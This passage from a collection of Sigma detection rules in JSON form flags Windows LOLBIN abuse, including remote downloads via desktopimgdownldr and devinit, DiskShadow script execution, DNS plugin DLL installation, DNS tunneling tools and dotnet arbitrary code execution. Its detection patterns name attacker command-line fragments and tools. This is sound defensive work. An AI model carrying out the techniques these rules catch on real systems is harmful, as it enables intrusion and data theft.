    "content": "title: Remote File Download Via Desktopimgdownldr Utility\nid: 214641c2-c579-4ecb-8427-0cf19df6842e\nstatus: test\ndescription: Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.\nreferences:\n    - https://www.elastic.co/guide/en/security/current/remote-file-download-via-desktopimgdownldr-utility.html\nauthor: Tim Rauch, Elastic (idea)\ndate: 2022-09-27\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\desktopimgdownldr.exe'\n        ParentImage|endswith: '\\desktopimgdownldr.exe'\n        CommandLine|contains: '/lockscreenurl:http'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml",
    "content": "title: Suspicious Desktopimgdownldr Command\nid: bb58aa4a-b80b-415a-a2c0-2f65a4c81009\nstatus: test\ndescription: Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet\nreferences:\n    - https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/\n    - https://twitter.com/SBousseaden/status/1278977301745741825\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-07-03\nmodified: 2021-11-27\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        CommandLine|contains: ' /lockscreenurl:'\n    selection1_filter:\n        CommandLine|contains:\n            - '.jpg'\n            - '.jpeg'\n            - '.png'\n    selection_reg:\n        CommandLine|contains|all:\n            - 'reg delete'\n            - '\\PersonalizationCSP'\n    condition: ( selection1 and not selection1_filter ) or selection_reg\nfalsepositives:\n    - False positives depend on scripts and administrative tools used in the monitored environment\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_devcon_disable_vmci_driver.yml",
    "content": "title: Devcon Execution Disabling VMware VMCI Device\nid: 85f520e7-6f5e-43ca-874c-222e5bf9c0de\nstatus: experimental\ndescription: |\n    Detects execution of devcon.exe with commands that disable the VMware Virtual Machine Communication Interface (VMCI) device.\n    This can be legitimate during VMware Tools troubleshooting or driver conflicts, but may also indicate malware attempting to hijack communication with the hardware via the VMCI device.\n    This has been used to facilitate VMware ESXi vulnerability exploits to escape VMs and execute code on the ESXi host.\nreferences:\n    - https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/devcon\n    - https://communities.vmware.com/t5/VMware-Workstation-Pro/VMCI-driver-issues/td-p/2866060\n    - https://github.com/search?q=devcon+disable+VMWVMCIHOSTDEV\n    - https://huntress.com/blog/esxi-vm-escape-exploit\nauthor: Matt Anderson, Dray Agha, Anna Pham (Huntress)\ndate: 2026-01-02\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543.003\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\devcon.exe'\n        - OriginalFileName: 'DevCon.exe'\n    selection_action:\n        CommandLine|contains: ' disable '\n    selection_vmci_pci:\n        CommandLine|contains:\n            - '15AD&DEV_0740' # VMware VMCI PCI device (Vendor 0x15AD = VMware, Device 0x0740 = VMCI)\n            - 'VMWVMCIHOSTDEV' # VMware VMCI root host device driver name\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate VMware administration, Tools installation/uninstallation, or troubleshooting driver conflicts.\n    - Automated scripts in virtualized environments for device cleanup.\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_devcon_disable_vmci_driver/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_device_credential_deployment.yml",
    "content": "title: DeviceCredentialDeployment Execution\nid: b8b1b304-a60f-4999-9a6e-c547bde03ffd\nstatus: test\ndescription: |\n    Detects the execution of DeviceCredentialDeployment to hide a process from view.\nreferences:\n    - https://github.com/LOLBAS-Project/LOLBAS/pull/147\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-19\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\DeviceCredentialDeployment.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_deviceenroller_dll_sideloading.yml",
    "content": "title: Potential DLL Sideloading Via DeviceEnroller.EXE\nid: e173ad47-4388-4012-ae62-bd13f71c18a8\nrelated:\n    - id: ee4c5d06-3abc-48cc-8885-77f1c20f4451\n      type: similar\nstatus: test\ndescription: |\n    Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named \"ShellChromeAPI.dll\".\n    Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\nreferences:\n    - https://mobile.twitter.com/0gtweet/status/1564131230941122561\n    - https://strontic.github.io/xcyclopedia/library/DeviceEnroller.exe-24BEF0D6B0ECED36BB41831759FDE18D.html\nauthor: '@gott_cyber'\ndate: 2022-08-29\nmodified: 2023-02-04\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\deviceenroller.exe'\n        - OriginalFileName: 'deviceenroller.exe'\n    selection_cli:\n        CommandLine|contains: '/PhoneDeepLink'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_devinit_lolbin_usage.yml",
    "content": "title: Arbitrary MSI Download Via Devinit.EXE\nid: 90d50722-0483-4065-8e35-57efaadd354d\nstatus: test\ndescription: Detects a certain command line flag combination used by \"devinit.exe\", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system\nreferences:\n    - https://twitter.com/mrd0x/status/1460815932402679809\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devinit/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-01-11\nmodified: 2023-04-06\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - ' -t msi-install '\n            - ' -i http'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dfsvc_suspicious_child_processes.yml",
    "content": "title: Potentially Suspicious Child Process Of ClickOnce Application\nid: 67bc0e75-c0a9-4cfc-8754-84a505b63c04\nstatus: test\ndescription: Detects potentially suspicious child processes of a ClickOnce deployment application\nreferences:\n    - https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-12\ntags:\n    - attack.execution\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|contains: '\\AppData\\Local\\Apps\\2.0\\'\n        Image|endswith:\n            # Add more suspicious processes\n            - '\\calc.exe'\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\explorer.exe'\n            - '\\mshta.exe'\n            - '\\net.exe'\n            - '\\net1.exe'\n            - '\\nltest.exe'\n            - '\\notepad.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\reg.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\schtasks.exe'\n            - '\\werfault.exe'\n            - '\\wscript.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dirlister_execution.yml",
    "content": "title: DirLister Execution\nid: b4dc61f5-6cce-468e-a608-b48b469feaa2\nstatus: test\ndescription: Detects the usage of \"DirLister.exe\", a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1083/T1083.md\n    - https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/\nauthor: frack113\ndate: 2022-08-20\nmodified: 2023-02-04\ntags:\n    - attack.discovery\n    - attack.t1083\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - OriginalFileName: 'DirLister.exe'\n        - Image|endswith: '\\DirLister.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate use by users\nlevel: low\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_dirlister_execution/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Launch DirLister Executable\n      technique: T1083\n      atomic_guid: c5bec457-43c9-4a18-9a24-fe151d8971b7\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_discovery_via_reg_queries.yml",
    "content": "title: System Information Discovery via Registry Queries\nid: 0022869c-49f7-4ff2-ba03-85ac42ddac58\nstatus: experimental\ndescription: Detects attempts to query system information directly from the Windows Registry.\nreferences:\n    - https://cert.gov.ua/article/6277849\n    - https://github.com/redcanaryco/atomic-red-team/blob/75fa21076dcefa348a7521403cdd6bfc4e88623c/atomics/T1082/T1082.md\n    - https://github.com/redcanaryco/atomic-red-team/blob/75fa21076dcefa348a7521403cdd6bfc4e88623c/atomics/T1124/T1124.md\nauthor: lazarg\ndate: 2025-06-12\nmodified: 2025-10-25\ntags:\n    - attack.discovery\n    - attack.t1082\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cmd_reg:\n        Image|endswith: '\\reg.exe'\n        CommandLine|contains: 'query'\n        CommandLine|contains|windash: '-v'\n    selection_cmd_powershell:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        CommandLine|contains:\n            - 'Get-ItemPropertyValue'\n            - 'gpv'\n    selection_keys:\n        CommandLine|contains:\n            - '\\SOFTWARE\\Microsoft\\Windows Defender' # Details about defender state\n            - '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' # Provides details about the OS\n            - '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall' # Lists installed programs\n            - '\\SYSTEM\\CurrentControlSet\\Control\\TimeZoneInformation' # Contains time zone details\n            - '\\SYSTEM\\CurrentControlSet\\Services' # Details about existing services\n    condition: 1 of selection_cmd_* and selection_keys\nfalsepositives:\n    - Unlikely\nlevel: low\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_discovery_via_reg_queries/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: System Information Discovery\n      technique: T1010\n      atomic_guid: 66703791-c902-4560-8770-42b8a91f7667\n    - type: atomic-red-team\n      name: Discover OS Product Name via Registry\n      technique: T1082\n      atomic_guid: be3b5fe3-a575-4fb8-83f6-ad4a68dd5ce7\n    - type: atomic-red-team\n      name: Discover OS Build Number via Registry\n      technique: T1082\n      atomic_guid: acfcd709-0013-4f1e-b9ee-bc1e7bafaaec\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_diskshadow_child_process_susp.yml",
    "content": "title: Potentially Suspicious Child Process Of DiskShadow.EXE\nid: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8\nrelated:\n    - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 # Diskshadow Script Mode - Execution From Potential Suspicious Location\n      type: similar\n    - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f # Diskshadow Script Mode - Uncommon Script Extension Execution\n      type: similar\n    - id: 56b1dde8-b274-435f-a73a-fb75eb81262a # Diskshadow Child Process Spawned\n      type: similar\n    - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 # Diskshadow Script Mode Execution\n      type: similar\nstatus: test\ndescription: Detects potentially suspicious child processes of \"Diskshadow.exe\". This could be an attempt to bypass parent/child relationship detection or application whitelisting rules.\nreferences:\n    - https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/\n    - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration\n    - https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow\n    - https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf\n    - https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware\n    - https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-09-15\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\diskshadow.exe'\n        Image|endswith:\n            # Note: add or remove additional binaries according to your org needs\n            - '\\certutil.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\wscript.exe'\n    condition: selection\nfalsepositives:\n    - False positives can occur in cases where admin scripts leverage the \"exec\" flag to execute applications\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_diskshadow_script_mode_susp_ext.yml",
    "content": "title: Diskshadow Script Mode - Uncommon Script Extension Execution\nid: 1dde5376-a648-492e-9e54-4241dd9b0c7f\nrelated:\n    - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 # Diskshadow Script Mode - Execution From Potential Suspicious Location\n      type: similar\n    - id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 # Potentially Suspicious Child Process Of DiskShadow.EXE\n      type: similar\n    - id: 56b1dde8-b274-435f-a73a-fb75eb81262a # Diskshadow Child Process Spawned\n      type: similar\n    - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 # Diskshadow Script Mode Execution\n      type: similar\nstatus: test\ndescription: |\n    Detects execution of \"Diskshadow.exe\" in script mode to execute a script with a potentially uncommon extension.\n    Initial baselining of the allowed extension list is required.\nreferences:\n    - https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/\n    - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration\n    - https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow\n    - https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf\n    - https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware\n    - https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-09-15\nmodified: 2024-03-05\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName: 'diskshadow.exe'\n        - Image|endswith: '\\diskshadow.exe'\n    selection_flag:\n        CommandLine|contains|windash: '-s '\n    filter_main_ext:\n        # Note: can be changed to an \"endswith\" to avoid rare FPs. But you need to account for quoted paths\n        # Note: Using the \".txt\" is based on the MS documentation example. Best add the extension you use internally before using this rule\n        CommandLine|contains: '.txt'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - False positives might occur with legitimate or uncommon extensions used internally. Initial baseline is required.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_diskshadow_script_mode_susp_location.yml",
    "content": "title: Diskshadow Script Mode - Execution From Potential Suspicious Location\nid: fa1a7e52-3d02-435b-81b8-00da14dd66c1\nrelated:\n    - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f # Diskshadow Script Mode - Uncommon Script Extension Execution\n      type: similar\n    - id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 # Potentially Suspicious Child Process Of DiskShadow.EXE\n      type: similar\n    - id: 56b1dde8-b274-435f-a73a-fb75eb81262a # Diskshadow Child Process Spawned\n      type: similar\n    - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 # Diskshadow Script Mode Execution\n      type: similar\nstatus: test\ndescription: Detects execution of \"Diskshadow.exe\" in script mode using the \"/s\" flag where the script is located in a potentially suspicious location.\nreferences:\n    - https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/\n    - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration\n    - https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow\n    - https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf\n    - https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware\n    - https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-09-15\nmodified: 2024-03-05\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName: 'diskshadow.exe'\n        - Image|endswith: '\\diskshadow.exe'\n    selection_cli:\n        CommandLine|contains|windash: '-s '\n    selection_paths:\n        CommandLine|contains:\n            # Note: Add additional susp paths based on your org needs\n            - ':\\Temp\\'\n            - ':\\Windows\\Temp\\'\n            - '\\AppData\\Local\\'\n            - '\\AppData\\Roaming\\'\n            - '\\ProgramData\\'\n            - '\\Users\\Public\\'\n    condition: all of selection_*\nfalsepositives:\n    - False positives may occur if you execute the script from one of the paths mentioned in the rule. Apply additional filters that fit your org needs.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dism_enable_powershell_web_access_feature.yml",
    "content": "title: PowerShell Web Access Feature Enabled Via DISM\nid: 7e8f2d3b-9c1a-4f67-b9e8-8d9006e0e51f\nstatus: test\ndescription: Detects the use of DISM to enable the PowerShell Web Access feature, which could be used for remote access and potential abuse\nreferences:\n    - https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature\n    - https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a\n    - https://gist.github.com/MHaggis/7e67b659af9148fa593cf2402edebb41\nauthor: Michael Haag\ndate: 2024-09-03\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\dism.exe'\n        - OriginalFileName: 'DISM.EXE'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'WindowsPowerShellWebAccess'\n            - '/online'\n            - '/enable-feature'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate PowerShell Web Access installations by administrators\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dism_remove.yml",
    "content": "title: Dism Remove Online Package\nid: 43e32da2-fdd0-4156-90de-50dfd62636f9\nstatus: test\ndescription: Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-26---disable-windows-defender-with-dism\n    - https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html\nauthor: frack113\ndate: 2022-01-16\nmodified: 2022-08-26\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_dismhost:\n        Image|endswith: '\\DismHost.exe'\n        ParentCommandLine|contains|all:\n            - '/Online'\n            - '/Disable-Feature'\n            # - '/FeatureName:'\n            # - '/Remove'\n            # /NoRestart\n            # /quiet\n    selection_dism:\n        Image|endswith: '\\Dism.exe'\n        CommandLine|contains|all:\n            - '/Online'\n            - '/Disable-Feature'\n            # - '/FeatureName:'\n            # - '/Remove'\n            # /NoRestart\n            # /quiet\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate script\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_dism_remove/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Disable Windows Defender with DISM\n      technique: T1562.001\n      atomic_guid: 871438ac-7d6e-432a-b27d-3e7db69faf58\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml",
    "content": "title: DLL Sideloading by VMware Xfer Utility\nid: ebea773c-a8f1-42ad-a856-00cb221966e8\nstatus: test\ndescription: Detects execution of the VMware Xfer utility (VMwareXferlogs.exe) from a non-default directory, which may be an attempt to sideload an arbitrary DLL\nreferences:\n    - https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-02\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '\\VMwareXferlogs.exe'\n    filter: # VMware might be installed in another path so update the rule accordingly\n        Image|startswith: 'C:\\Program Files\\VMware\\'\n    condition: selection and not filter\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dllhost_no_cli_execution.yml",
    "content": "title: Dllhost.EXE Execution Anomaly\nid: e7888eb1-13b0-4616-bd99-4bc0c2b054b9\nstatus: test\ndescription: Detects a \"dllhost\" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.\nreferences:\n    - https://redcanary.com/blog/child-processes/\n    - https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-27\nmodified: 2023-05-15\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1055\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\dllhost.exe'\n        CommandLine:\n            - 'dllhost.exe'\n            - 'dllhost'\n    filter_main_null:\n        CommandLine: null\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dns_exfiltration_tools_execution.yml",
    "content": "title: DNS Exfiltration and Tunneling Tools Execution\nid: 98a96a5a-64a0-4c42-92c5-489da3866cb0\nstatus: test\ndescription: Detects the execution of well-known DNS exfiltration and tunneling tools\nreferences:\n    - https://github.com/iagox86/dnscat2\n    - https://github.com/yarrick/iodine\nauthor: Daniil Yugoslavskiy, oscd.community\ndate: 2019-10-24\nmodified: 2021-11-27\ntags:\n    - attack.exfiltration\n    - attack.t1048.001\n    - attack.command-and-control\n    - attack.t1071.004\n    - attack.t1132.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\iodine.exe'\n        - Image|contains: '\\dnscat2'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dns_susp_child_process.yml",
    "content": "title: Unusual Child Process of dns.exe\nid: a4e3d776-f12e-42c2-8510-9e6ed1f43ec3\nstatus: test\ndescription: Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)\nreferences:\n    - https://www.elastic.co/guide/en/security/current/unusual-child-process-of-dns-exe.html\nauthor: Tim Rauch, Elastic (idea)\ndate: 2022-09-27\nmodified: 2023-02-05\ntags:\n    - attack.persistence\n    - attack.initial-access\n    - attack.t1133\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\dns.exe'\n    filter:\n        Image|endswith: '\\conhost.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml",
    "content": "title: Potential Discovery Activity Via Dnscmd.EXE\nid: b6457d63-d2a2-4e29-859d-4e7affc153d1\nstatus: test\ndescription: Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones are used to host the DNS records for a particular domain.\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd\n    - https://learn.microsoft.com/en-us/azure/dns/dns-zones-records\n    - https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/\nauthor: '@gott_cyber'\ndate: 2022-07-31\nmodified: 2023-02-04\ntags:\n    - attack.discovery\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith: '\\dnscmd.exe'\n    selection_cli:\n        CommandLine|contains:\n            - '/enumrecords'\n            - '/enumzones'\n            - '/ZonePrint'\n            - '/info'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administration use\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml",
    "content": "title: New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE\nid: f63b56ee-3f79-4b8a-97fb-5c48007e8573\nrelated:\n    - id: e61e8a88-59a9-451c-874e-70fcc9740d67\n      type: derived\n    - id: cbe51394-cd93-4473-b555-edf0144952d9\n      type: derived\nstatus: test\ndescription: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)\nreferences:\n    - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83\n    - https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-05-08\nmodified: 2023-02-05\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\n    - attack.t1112\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\dnscmd.exe'\n        CommandLine|contains|all:\n            - '/config'\n            - '/serverlevelplugindll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dnx_execute_csharp_code.yml",
    "content": "title: Potential Application Whitelisting Bypass via Dnx.EXE\nid: 81ebd28b-9607-4478-bf06-974ed9d53ed7\nstatus: test\ndescription: |\n    Detects the execution of Dnx.EXE. The Dnx utility allows for the execution of C# code.\n    Attackers might abuse this in order to bypass application whitelisting.\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/\n    - https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/\nauthor: Beyu Denis, oscd.community\ndate: 2019-10-26\nmodified: 2024-04-24\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.t1027.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\dnx.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate use of dnx.exe by legitimate user\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dotnet_arbitrary_dll_csproj_execution.yml",
    "content": "title: Arbitrary DLL or Csproj Code Execution Via Dotnet.EXE\nid: d80d5c81-04ba-45b4-84e4-92eba40e0ad3\nstatus: test\ndescription: Detects Dotnet.EXE being invoked with a \".dll\" or \".csproj\" file as its argument, which allows execution of arbitrary DLLs or of unsigned code embedded in a project file.\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/\n    - https://twitter.com/_felamos/status/1204705548668555264\n    - https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/\nauthor: Beyu Denis, oscd.community\ndate: 2020-10-18\nmodified: 2025-10-08\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\dotnet.exe'\n        - OriginalFileName: '.NET Host'\n    selection_cli:\n        CommandLine|endswith:\n            - '.csproj'\n            - '.csproj\"'\n            - '.dll'\n            - '.dll\"'\n            - \".csproj'\"\n            - \".dll'\"\n    filter_optional_notepadplus_plus:\n        ParentImage:\n            - 'C:\\Program Files (x86)\\Notepad++\\notepad++.exe'\n            - 'C:\\Program Files\\Notepad++\\notepad++.exe'\n        CommandLine|contains|all:\n            - 'C:\\ProgramData\\CSScriptNpp\\'\n            - '-cscs_path:'\n            - '\\cs-script\\cscs.dll'\n    condition: all of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate administrator usage\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_dotnet_trace_lolbin_execution.yml",
